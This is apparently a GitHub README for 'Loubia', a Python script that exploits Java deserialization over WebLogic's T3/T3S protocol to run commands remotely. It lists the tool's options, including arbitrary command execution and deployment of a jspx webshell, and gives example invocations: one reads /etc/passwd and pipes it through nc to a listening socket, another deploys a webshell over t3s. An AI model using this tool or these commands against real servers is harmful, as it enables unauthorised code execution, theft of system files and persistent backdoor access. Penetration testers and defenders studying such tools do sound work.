Python script to exploit java unserialize on t3 (Weblogic)
Switch branches/tags
Nothing to show
Clone or download
metalnas Merge pull request #4 from itscooper/master
Fixed Minor Indentation Bug
Latest commit 65363d2 Aug 9, 2017
Failed to load latest commit information.
LICENSE Initial commit Mar 22, 2016 Update Mar 29, 2016 Fixed Minor Indentation Bug Aug 9, 2017


Python script that achieves remote code execution on t3 enabled backends. This is possible thanks to (or because of) the Java Unserialize vulnerability.


Below is the help of Loubia showing its awesome functionalities:

	Usage: hostname port [options]
	  --version             show program's version number and exit
	  -h, --help            show this help message and exit
	  -c PAYLOAD, --cmd=PAYLOAD
	                        Command to execute
	  -o OS, --os=OS        Target operating system (unix/win). Default is unix
	  -l SHELL, --shell=SHELL
	                        shell to use (sh/bash). Default is sh
	  -s, --ssl             Use t3s protocol. Default : false
	  -p PROTOCOL, --protocol=PROTOCOL
	                        SSL protocol to use (sslv3/tlsv1/best). Default is
	  -w, --webshell        Deploy a jspx webshell
	  -u URL, --url=URL     Deploy the jspx webshell to the target URL path
	                        (webshell name will be URL_.jspx)
	  -v, --verbose         Print verbose output. Default : false


Disclosing /etc/passwd to a local listening socket

	./ 7001 -c "cat /etc/passwd | nc 6666"

Deploying a webshell using bash on t3s

	./ 7002 -s -l bash -w


For more details see this post